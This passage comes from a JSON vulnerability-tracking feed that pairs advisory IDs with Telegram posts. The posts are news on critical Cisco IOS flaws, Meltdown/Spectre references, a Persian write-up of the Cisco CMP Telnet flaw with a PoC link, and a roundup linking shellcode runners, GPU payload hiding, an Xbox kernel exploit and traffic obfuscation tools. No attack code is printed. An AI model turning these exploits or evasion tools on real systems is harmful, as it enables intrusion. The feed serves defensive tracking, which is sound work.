"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2021:2301", "type": "published-proof-of-concept", "source": "Telegram/OphBtcFHpzsAaa_PBsn-6jMA-guExzs3Tjx94NVn8zTfkHs", "content": "", "creation_timestamp": "2021-06-10T02:57:54.000000Z"}, {"uuid": "36ee8e78-25a1-41b0-befa-bcab11eb3306", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180328-BFD", "type": "published-proof-of-concept", "source": "Telegram/LkbJUUrQveQYovbxSrsr22G-FLBPm05UXf0_f1nNbpINEOk", "content": "", "creation_timestamp": "2021-06-10T02:57:30.000000Z"}, {"uuid": "cd89f06f-130c-4e3c-8e78-2d0c3393cc57", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HH3-VJ32-GR6J", "type": "published-proof-of-concept", "source": "https://t.me/Unik4tsG4ng/7190", "content": "Tools  - Hackers Factory \n\nTookie-osint has a simple-to-use UI and is really straightforward. The main idea of Tookie-osint is to discover usernames that are requested from an input.\n\nhttps://github.com/Alfredredbird/tookie-osint\n\n#CyberDilara\n\nGPU poisoning; hide the payload inside the gpu memory.\n\nhttps://github.com/H1d3r/GPU_ShellCode\n\nThis is a simple obfuscator for WireGuard. It is designed to make it harder to detect WireGuard traffic by making it look like something else.\n\nhttps://github.com/ClusterM/wg-obfuscator\n\nSploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability.\n\nhttps://github.com/xaitax/SploitScan\n\nA shellcode runner write in Rust use\n\nhttps://github.com/b1tg/rs-shellcode\n\nKernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nZip Slip Vulnerability in .a Static Library Files.  Since the implemented measure can be bypassed, the vulnerability allows an attacker to extract files to any desired location within the server running #MobSF.\n\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-4hh3-vj32-gr6j\n\nPython script to monitor your target continuously for new subdomains.\n\nhttps://github.com/faiyazahmad07/monitor_subdomains", "creation_timestamp": "2024-08-27T13:45:55.000000Z"}, {"uuid": "0945d99d-0abc-4a65-9c7e-810bcc97f1eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2018:0017", "type": "exploited", "source": "https://t.me/information_security_channel/11989", "content": "Pessoal segue informa\u00e7\u00f5es e links sobre o caso:\n\nMeltdown and Spectre CPU Flaws Affect Intel, ARM, AMD Processors\nhttps://thehackernews.com/2018/01/meltdown-spectre-vulnerability.html\n \nProjectZero\nhttps://googleprojectzero.blogspot.com.br/2018/01/reading-privileged-memory-with-side.html\n \nIntel Responds to Security Research Findings\nhttps://newsroom.intel.com/news/intel-responds-to-security-research-findings/\n \n \nCPU hardware vulnerable to side-channel attacks\nhttp://www.kb.cert.org/vuls/id/584653\n \nMeltdown breaks the most fundamental isolation between user applications and the operating system. This attack allows a program to access the memory, and thus also the secrets, of other programs and the operating system.\nhttps://meltdownattack.com/\n \nSpectre breaks the isolation between different applications. It allows an attacker to trick error-free programs, which follow best practices, into leaking their secrets. In fact, the safety checks of said best practices actually increase the attack surface and may make applications more susceptible to Spectre\nhttps://spectreattack.com/\n\n\nMicrosoft\nhttps://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180002\n \nMicrosoft Azure\nhttps://azure.microsoft.com/en-us/blog/securing-azure-customers-from-cpu-vulnerability/\n \nAWS\nhttps://aws.amazon.com/security/security-bulletins/AWS-2018-013/\n \nLinux RedHat\nhttps://access.redhat.com/errata/RHSA-2018:0017\n \nVMware\nhttps://www.vmware.com/security/advisories/VMSA-2018-0002.html\n \nCitrix\nhttps://support.citrix.com/article/CTX231399\n \nGoogle Chrome\nhttps://www.chromium.org/Home/chromium-security/ssca\n \nMozilla Firefox\nhttps://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/", "creation_timestamp": "2018-01-04T15:39:21.000000Z"}, {"uuid": "bb261544-1203-4e1a-8de7-2edbed3a46a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180328-XESC", "type": "seen", "source": "https://t.me/information_security_channel/15590", "content": "Critical Flaw Exposes Many Cisco Devices to Remote Attacks\nhttp://feedproxy.google.com/~r/Securityweek/~3/4Q4ROpCwsY0/critical-flaw-exposes-many-cisco-devices-remote-attacks\n\nCisco has patched more than 30 vulnerabilities in its IOS software, including a critical remote code execution flaw that exposes hundreds of thousands \u2013 possibly millions \u2013 of devices to remote attacks launched over the Internet.\nA total of three vulnerabilities have been rated critical. One of them is CVE-2018-0171 (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2), an issue discovered by researchers at Embedi in the Smart Install feature in IOS and IOS XE software.\nAn unauthenticated attacker can send specially crafted Smart Install messages to an affected device on TCP port 4786 and cause it to enter a denial-of-service (DoS) condition or execute arbitrary code.\nCisco pointed out that Smart Install is enabled by default on switches that have not received a recent update for automatically disabling the feature when it\u2019s not in use.\nEmbedi has published a blog post (https://embedi.com/blog/cisco-smart-install-remote-code-execution/) detailing CVE-2018-0171 and how it can be exploited. Researchers initially believed the vulnerability could only be exploited by an attacker inside the targeted organization\u2019s network. However, an Internet scan revealed that there are roughly 250,000 vulnerable Cisco devices that have TCP port 4786 open.\nFurthermore, Embedi told SecurityWeek that it has identified approximately 8.5 million devices that use this port, but researchers have not been able to determine if the Smart Install technology is present on these systems.\nAnother IOS vulnerability patched by Cisco and rated critical is CVE-2018-0150, a backdoor (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-xesc) that allows an attacker to remotely access a device. This security hole is introduced by the existence of an undocumented account with a default username and password. The credentials provide access to a device with privilege level 15, the highest level of access for Cisco network devices.\nThe last critical security hole  (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos)is CVE-2018-0151, which affects the quality of service (QoS) subsystem of IOS and IOS XE software. The flaw can allow a remote an unauthenticated attacker to cause a DoS condition or execute code with elevated privileges by sending malicious packets to a device.\nThe networking giant has patched a total of 17 high severity flaws in IOS and IOS XE software. The list includes mostly DoS issues, but some of the vulnerabilities can be exploited for remote code execution and privilege escalation.\nCisco also patched over a dozen IOS vulnerabilities rated \u201cmedium severity.\u201d A majority of the bugs were discovered by the company itself and there is no evidence that any of them have been exploited for malicious purposes.\nRelated: Cisco Patches Hard-coded Password in PCP Software (https://www.securityweek.com/cisco-patches-hard-coded-password-pcp-software)\nRelated: Cisco Reissues Patches for Critical Firewall Flaw (https://www.securityweek.com/cisco-reissues-patches-critical-firewall-flaw)\nRelated: Cisco Patches Flaws in Email Security, Other Products (https://www.securityweek.com/cisco-patches-flaws-email-security-other-products)", "creation_timestamp": "2018-03-30T12:01:10.000000Z"}, {"uuid": "87a08fbc-d162-401a-8714-6cb0d6f2e8e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180328-SMI2", "type": "seen", "source": "https://t.me/information_security_channel/15590", "content": "Critical Flaw Exposes Many Cisco Devices to Remote Attacks\nhttp://feedproxy.google.com/~r/Securityweek/~3/4Q4ROpCwsY0/critical-flaw-exposes-many-cisco-devices-remote-attacks\n\nCisco has patched more than 30 vulnerabilities in its IOS software, including a critical remote code execution flaw that exposes hundreds of thousands \u2013 possibly millions \u2013 of devices to remote attacks launched over the Internet.\nA total of three vulnerabilities have been rated critical. One of them is CVE-2018-0171 (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2), an issue discovered by researchers at Embedi in the Smart Install feature in IOS and IOS XE software.\nAn unauthenticated attacker can send specially crafted Smart Install messages to an affected device on TCP port 4786 and cause it to enter a denial-of-service (DoS) condition or execute arbitrary code.\nCisco pointed out that Smart Install is enabled by default on switches that have not received a recent update for automatically disabling the feature when it\u2019s not in use.\nEmbedi has published a blog post (https://embedi.com/blog/cisco-smart-install-remote-code-execution/) detailing CVE-2018-0171 and how it can be exploited. Researchers initially believed the vulnerability could only be exploited by an attacker inside the targeted organization\u2019s network. However, an Internet scan revealed that there are roughly 250,000 vulnerable Cisco devices that have TCP port 4786 open.\nFurthermore, Embedi told SecurityWeek that it has identified approximately 8.5 million devices that use this port, but researchers have not been able to determine if the Smart Install technology is present on these systems.\nAnother IOS vulnerability patched by Cisco and rated critical is CVE-2018-0150, a backdoor (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-xesc) that allows an attacker to remotely access a device. This security hole is introduced by the existence of an undocumented account with a default username and password. The credentials provide access to a device with privilege level 15, the highest level of access for Cisco network devices.\nThe last critical security hole  (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos)is CVE-2018-0151, which affects the quality of service (QoS) subsystem of IOS and IOS XE software. The flaw can allow a remote an unauthenticated attacker to cause a DoS condition or execute code with elevated privileges by sending malicious packets to a device.\nThe networking giant has patched a total of 17 high severity flaws in IOS and IOS XE software. The list includes mostly DoS issues, but some of the vulnerabilities can be exploited for remote code execution and privilege escalation.\nCisco also patched over a dozen IOS vulnerabilities rated \u201cmedium severity.\u201d A majority of the bugs were discovered by the company itself and there is no evidence that any of them have been exploited for malicious purposes.\nRelated: Cisco Patches Hard-coded Password in PCP Software (https://www.securityweek.com/cisco-patches-hard-coded-password-pcp-software)\nRelated: Cisco Reissues Patches for Critical Firewall Flaw (https://www.securityweek.com/cisco-reissues-patches-critical-firewall-flaw)\nRelated: Cisco Patches Flaws in Email Security, Other Products (https://www.securityweek.com/cisco-patches-flaws-email-security-other-products)", "creation_timestamp": "2018-03-30T12:01:10.000000Z"}, {"uuid": "1f0c4af3-40a4-48c9-9465-49ac7a219b14", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180328-QOS", "type": "seen", "source": "https://t.me/information_security_channel/15590", "content": "Critical Flaw Exposes Many Cisco Devices to Remote Attacks\nhttp://feedproxy.google.com/~r/Securityweek/~3/4Q4ROpCwsY0/critical-flaw-exposes-many-cisco-devices-remote-attacks\n\nCisco has patched more than 30 vulnerabilities in its IOS software, including a critical remote code execution flaw that exposes hundreds of thousands \u2013 possibly millions \u2013 of devices to remote attacks launched over the Internet.\nA total of three vulnerabilities have been rated critical. One of them is CVE-2018-0171 (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2), an issue discovered by researchers at Embedi in the Smart Install feature in IOS and IOS XE software.\nAn unauthenticated attacker can send specially crafted Smart Install messages to an affected device on TCP port 4786 and cause it to enter a denial-of-service (DoS) condition or execute arbitrary code.\nCisco pointed out that Smart Install is enabled by default on switches that have not received a recent update for automatically disabling the feature when it\u2019s not in use.\nEmbedi has published a blog post (https://embedi.com/blog/cisco-smart-install-remote-code-execution/) detailing CVE-2018-0171 and how it can be exploited. Researchers initially believed the vulnerability could only be exploited by an attacker inside the targeted organization\u2019s network. However, an Internet scan revealed that there are roughly 250,000 vulnerable Cisco devices that have TCP port 4786 open.\nFurthermore, Embedi told SecurityWeek that it has identified approximately 8.5 million devices that use this port, but researchers have not been able to determine if the Smart Install technology is present on these systems.\nAnother IOS vulnerability patched by Cisco and rated critical is CVE-2018-0150, a backdoor (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-xesc) that allows an attacker to remotely access a device. This security hole is introduced by the existence of an undocumented account with a default username and password. The credentials provide access to a device with privilege level 15, the highest level of access for Cisco network devices.\nThe last critical security hole  (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-qos)is CVE-2018-0151, which affects the quality of service (QoS) subsystem of IOS and IOS XE software. The flaw can allow a remote an unauthenticated attacker to cause a DoS condition or execute code with elevated privileges by sending malicious packets to a device.\nThe networking giant has patched a total of 17 high severity flaws in IOS and IOS XE software. The list includes mostly DoS issues, but some of the vulnerabilities can be exploited for remote code execution and privilege escalation.\nCisco also patched over a dozen IOS vulnerabilities rated \u201cmedium severity.\u201d A majority of the bugs were discovered by the company itself and there is no evidence that any of them have been exploited for malicious purposes.\nRelated: Cisco Patches Hard-coded Password in PCP Software (https://www.securityweek.com/cisco-patches-hard-coded-password-pcp-software)\nRelated: Cisco Reissues Patches for Critical Firewall Flaw (https://www.securityweek.com/cisco-reissues-patches-critical-firewall-flaw)\nRelated: Cisco Patches Flaws in Email Security, Other Products (https://www.securityweek.com/cisco-patches-flaws-email-security-other-products)", "creation_timestamp": "2018-03-30T12:01:10.000000Z"}, {"uuid": "a11ceb7d-868c-4660-9356-807313ddf96a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20180328-SMI2", "type": "seen", "source": "https://t.me/canyoupwnme/3491", "content": "Cisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2", "creation_timestamp": "2018-03-30T13:51:57.000000Z"}, {"uuid": "cb4283bc-51da-4647-960d-eac15ff5ff36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20160715-BGP", "type": "seen", "source": "https://t.me/itsecalert/34", "content": "\u26a0\ufe0f Cisco IOS and IOS XE Software Border Gateway Protocol Message Processing Denial of Service Vulnerability \ud83e\udd14 Workarounds exist. (Severity: \ud83d\udd39medium) Further Information: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160715-bgp\n#alert #vulnerability #severitymedium #cisco #ios #bgp #router\n\ud83d\udcf2 Forward this to your fellow network admins! \ud83d\ude1c", "creation_timestamp": "2016-07-18T10:13:42.000000Z"}, {"uuid": "f520260d-43f3-499d-a154-8b4e62ed00e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170317-CMP", "type": "published-proof-of-concept", "source": "https://t.me/SHATOOB/1435", "content": "\ud83c\udd94 @SHATOOB\n\n\n  \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0631  Cisco Cluster Management Protocol  \u06cc\u0627 CMP  \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632  \u0633\u0648\u0626\u06cc\u0686 \u0647\u0627\u06cc  Cisco Catalyst \u0647\u0627 \u0631\u0627 \u062f\u0631 \u0645\u0639\u0631\u0636 \u062e\u0637\u0631 \u0642\u0631\u0627\u0631 \u062f\u0627\u062f\u0647 \u0627\u0633\u062a .\n\n\ud83d\udd39\u0627\u06af\u0631 \u0647\u0645\u0686\u0646\u0627\u0646 \u0628\u0631\u0627\u06cc \u0627\u062a\u0635\u0627\u0644 \u0628\u0647 \u0633\u0648\u0626\u06cc\u0686 \u0647\u0627\u06cc  Cisco \u062f\u0631 \u0634\u0628\u06a9\u0647 \u062e\u0648\u062f \u0627\u0632  Telnet \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u06a9\u0646\u06cc\u062f \u0648 \u062f\u0633\u062a\u0631\u0633\u06cc \u0628\u0647 \u0633\u0648\u0626\u06cc\u0686 \u0647\u0627\u06cc \u062e\u0648\u062f \u0631\u0627 \u0645\u062d\u062f\u0648\u062f \u0646\u06a9\u0631\u062f\u0647 \u0627\u06cc\u062f \u0628\u0627\u06cc\u062f \u0646\u06af\u0631\u0627\u0646 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0627\u0634\u06cc\u062f. \u06a9\u0627\u0641\u06cc \u0627\u0633\u062a \u0645\u0647\u0627\u062c\u0645 \u0628\u0647 \u0646\u0642\u0637\u0647 \u0627\u06cc \u0627\u0632 \u0634\u0628\u06a9\u0647 \u0634\u0645\u0627 \u0645\u062a\u0635\u0644 \u0634\u0648\u062f \u0648 \u0628\u062a\u0648\u0627\u0646\u062f \u0627\u0632 \u0637\u0631\u06cc\u0642 Telnet \u0628\u0647 \u0633\u0648\u0626\u06cc\u0686 \u0647\u0627\u06cc \u0634\u0645\u0627 \u0645\u062a\u0635\u0644 \u0634\u0648\u062f .\n\n\ud83d\udd39\u0645\u0646\u0634\u0623 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0646\u0642\u0635 \u062f\u0631 \u06a9\u062f( Cisco Cluster Management Protocol (CMP \u062f\u0631 Cisco IOS \u0648 Cisco IOS XE \u0630\u06a9\u0631 \u0634\u062f\u0647 \u0627\u0633\u062a .\n\n\u0634\u0627\u06cc\u0627\u0646 \u0630\u06a9\u0631 \u0627\u0633\u062a \u0627\u0632 \u0627\u0646\u062a\u0634\u0627\u0631 \u0627\u0648\u0644\u06cc\u0647 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062d\u062f\u0648\u062f \u06cc\u06a9 \u0645\u0627\u0647 \u0645\u06cc \u06af\u0630\u0631\u062f \u0648\u0644\u06cc \u0628\u0647 \u062c\u0647\u062a \u0627\u0647\u0645\u06cc\u062a \u0648 \u0634\u062f\u062a \u0628\u0627\u0644\u0627\u06cc \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc  \u0648 \u0647\u0645\u0686\u0646\u06cc\u0646 \u0627\u0646\u062a\u0634\u0627\u0631 POC \u0645\u0631\u0628\u0648\u0637\u0647 \u060c \u0628\u0647 \u0622\u0646 \u0627\u0634\u0627\u0631\u0647 \u06af\u0631\u062f\u06cc\u062f .\n\n\ud83d\udd38\u06cc\u06a9 \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0627 \u0627\u0631\u0633\u0627\u0644 \u0646\u0627\u0642\u0635 \u06af\u0632\u06cc\u0646\u0647 \u0647\u0627\u06cc \u062e\u0627\u0635 Telnet \u06a9\u0647 \u0628\u0631\u0627\u06ccCisco Cluster Management Protocol  \u0628\u0647 \u06a9\u0627\u0631 \u0645\u06cc \u0631\u0648\u062f\u060c \u0628\u0647 \u06cc\u06a9 \u062f\u0633\u062a\u06af\u0627\u0647 Cisco \u0645\u062a\u0635\u0644 \u0634\u0648\u062f .\n\n\ud83d\udd39\u0628\u0627 \u0628\u0647\u0631\u0647 \u0628\u0631\u062f\u0627\u0631\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0645\u0647\u0627\u062c\u0645 \u0645\u06cc \u062a\u0648\u0627\u0646\u062f \u06a9\u062f \u062f\u0644\u062e\u0648\u0627\u0647 \u062e\u0648\u062f \u0631\u0627 \u0627\u062c\u0631\u0627 \u06a9\u0646\u062f\u060c \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u062f\u0633\u062a\u06af\u0627\u0647 \u0631\u0627 \u062f\u0631 \u0627\u062e\u062a\u06cc\u0627\u0631 \u0628\u06af\u06cc\u0631\u062f \u06cc\u0627 \u0622\u0646 \u0631\u0627 reload \u06a9\u0646\u062f .\n\n\ud83d\udd39\u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u062a\u062c\u0647\u06cc\u0632\u0627\u062a Catalyst \u0634\u0631\u06a9\u062a Cisco \u0631\u0627 \u062a\u062d\u062a \u062a\u0623\u062b\u06cc\u0631 \u0642\u0631\u0627\u0631 \u0645\u06cc \u062f\u0647\u062f  \u06a9\u0647 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0622\u0646\u0647\u0627 \u0639\u0628\u0627\u0631\u062a\u0646\u062f \u0627\u0632 : \n\n\u2022  \u0627\u0646\u0648\u0627\u0639 \u0645\u062e\u062a\u0644\u0641\u06cc \u0627\u0632 Cisco Catalyst 2960 \u0634\u0627\u0645\u0644 2960L\u060c 2960S\u060c 2960X\u060c 2960XR\n\u2022 \u0627\u0646\u0648\u0627\u0639 \u0645\u062e\u062a\u0644\u0641\u06cc \u0627\u0632 Cisco Catalyst 3560 \u0634\u0627\u0645\u0644 3560C\u060c 3560CX\u060c 3560E\u060c 3560G\u060c3560V2\u060c 3560X\n\u2022  \u0627\u0646\u0648\u0627\u0639 \u0645\u062e\u062a\u0644\u0641\u06cc \u0627\u0632 Cisco Catalyst 3750 \u0627\u0632 \u062c\u0645\u0644\u0647 3750E\u060c 3750G\u060c 3750V2\u060c 3750X\n\u2022  \u0627\u0646\u0648\u0627\u0639 \u0645\u062e\u062a\u0644\u0641\u06cc \u0627\u0632 Cisco Catalyst 4500 Supervisor Engine   \u0627\u0632 \u062c\u0645\u0644\u0647 II-Plus \u060cII-Plus-TS \u060cV-10GE \u060cII-Plus-10GE \u060c6-E \u060c6L-E\n\u2022 \u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u0646\u0648\u0627\u0639 Cisco Catalyst 4948\n\u2022  \u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u0646\u0648\u0627\u0639 Cisco IE 2000\u060c Cisco IE 3000\u060c Cisco IE 4000\n\u2022  \u0648 ...\n\n\ud83d\udd38 \u0634\u0631\u06a9\u062a Cisco \u0627\u0639\u0644\u0627\u0645 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0645\u0631\u062a\u0628\u0637 \u0631\u0627 \u0628\u0647 \u0632\u0648\u062f\u06cc \u0645\u0646\u062a\u0634\u0631 \u062e\u0648\u0627\u0647\u062f \u06a9\u0631\u062f .\n\n\ud83d\udd39 \u0647\u0645\u0686\u0646\u06cc\u0646 Proof Of Concept \u06cc\u0627  POC \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc  \u0646\u06cc\u0632 \u062f\u0631 \u062f\u0633\u062a\u0631\u0633 \u0642\u0631\u0627\u0631 \u06af\u0631\u0641\u062a \u0648  \u0627\u0634\u0627\u0631\u0647 \u0645\u06cc \u06a9\u0646\u062f  \u06a9\u0647 \u062f\u0631 \u0627\u0633\u0646\u0627\u062f  Vault 7 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647 \u0627\u0632 \u0633\u0648\u06cc  WikiLeaks \u060c \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc  ROCEM \u0646\u0627\u0645\u06cc\u062f\u0647 \u0634\u062f\u0647 \u0627\u0633\u062a .\n\n\n\ud83d\udd39\u0628\u0631\u0627\u06cc \u0645\u0637\u0627\u0644\u0639\u0647 \u0648 \u0628\u0631\u0631\u0633\u06cc \u062f\u0642\u06cc\u0642 \u062a\u0631 \u0628\u0647 \u0645\u0646\u0627\u0628\u0639 \u0627\u0635\u0644\u06cc \u0645\u0631\u0627\u062c\u0639\u0647 \u0641\u0631\u0645\u0627\u06cc\u06cc\u062f .\n\n\u0645\u0646\u0628\u0639 :\n\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp\nhttps://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/\nhttps://github.com/artkond/cisco-rce\n\n\u269c\ufe0f\u269c\ufe0f  \u0634\u0627\u062a\u0648\u0628 \u062f\u0631\u06cc\u0686\u0647 \u0627\u06cc \u0628\u0647 \u062f\u0646\u06cc\u0627\u06cc \u0631\u0627\u06cc\u0627\u0646\u0647 \u269c\ufe0f\u269c\ufe0f\n\n\ud83c\udd94 @SHATOOB", "creation_timestamp": "2017-04-14T03:07:14.000000Z"}, {"uuid": "eb14fc23-3b21-49ab-b63a-4644362036c6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CISCO-SA-20170419-UCM", "type": "seen", "source": "https://t.me/SHATOOB/1462", "content": "\ud83c\udd94 @SHATOOB\n\n#Update\n\n\u0647\u0641\u062a\u0647 \u067e\u0631\u06a9\u0627\u0631 \u062f\u0631 \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc \u0645\u062d\u0635\u0648\u0644\u0627\u062a\n\n\ud83d\udd3b  Apr 18  Oracle\n\n\ud83d\udd38\u0648\u0635\u0644\u0647 \u0647\u0627\u06cc \u0628\u0631\u0648\u0632 \u0631\u0633\u0627\u0646\u06cc April 2017 \u0627\u0632 \u0633\u0648\u06cc Oracle \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 299 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062f\u0631 \u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641 \u0627\u06cc\u0646 \u0634\u0631\u06a9\u062a \u0645\u0646\u062a\u0634\u0631 \u06af\u0631\u062f\u06cc\u062f .\n\n\ud83c\udf10 http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html\n\n\n\ud83d\udd3b Apr 18 VMware\n\n\ud83d\udd39\u0634\u0631\u06a9\u062a VMware \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc \u0627\u0645\u0646\u06cc\u062a\u06cc \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc Unified Access Gateway\u060c Horizon View \u0648 Workstation \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f . \u0628\u0631\u062e\u06cc \u0627\u0632 \u0627\u06cc\u0646 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0628\u0627 \u0634\u062f\u062a Critical \u062f\u0631\u062c\u0647 \u0628\u0646\u062f\u06cc \u0634\u062f\u0647 \u0627\u0646\u062f .\n\n\ud83c\udf10 http://www.vmware.com/security/advisories/VMSA-2017-0008.html\n\n\n\ud83d\udd3b Apr 19 Chrome\n\n\ud83d\udd38\u0627\u0646\u062a\u0634\u0627\u0631 \u0646\u0633\u062e\u0647 Chrome 58.0.3029.81 \u0628\u0631\u0627\u06cc Windows \u060c Mac \u0648 Linux \u062a\u0648\u0633\u0637 Google \u062c\u0647\u062a \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0645\u062a\u0639\u062f\u062f \u0627\u06cc\u0646 \u0645\u0631\u0648\u0631\u06af\u0631 .\n\n\ud83c\udf10  https://chromereleases.googleblog.com/2017/04/stable-channel-update-for-desktop.html\n\n\n\ud83d\udd3b Apr 19 Firefox\n\n\ud83d\udd39\u0628\u0646\u06cc\u0627\u062f  Mozilla \u0646\u06cc\u0632 \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc\u06cc \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0627\u0646\u0648\u0627\u0639 \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Firefox \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f .  \u0646\u0633\u062e\u0647 \u0647\u0627\u06cc Firefox 53\u060c Firefox ESR 45.9 \u0648 Firefox ESR 52.1 \u062c\u0647\u062a \u0631\u0641\u0639 \u0627\u06cc\u0646 \u0622\u064f\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627 \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0646\u062f .\n\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-10/\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-11/\n\ud83c\udf10 https://www.mozilla.org/en-US/security/advisories/mfsa2017-12/\n\n\n\ud83d\udd3b Apr 19  Cisco\n\n\ud83d\udd38\u0634\u0631\u06a9\u062a Cisco \u0628\u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0647\u0627\u06cc\u06cc \u0631\u0627 \u0628\u0631\u0627\u06cc \u0631\u0641\u0639 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0647\u0627\u06cc \u0645\u062a\u0639\u062f\u062f \u062f\u0631 \u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0645\u062e\u062a\u0644\u0641 \u062e\u0648\u062f \u0645\u0646\u062a\u0634\u0631 \u06a9\u0631\u062f \u06a9\u0647 \u0628\u0631\u062e\u06cc \u0627\u0632 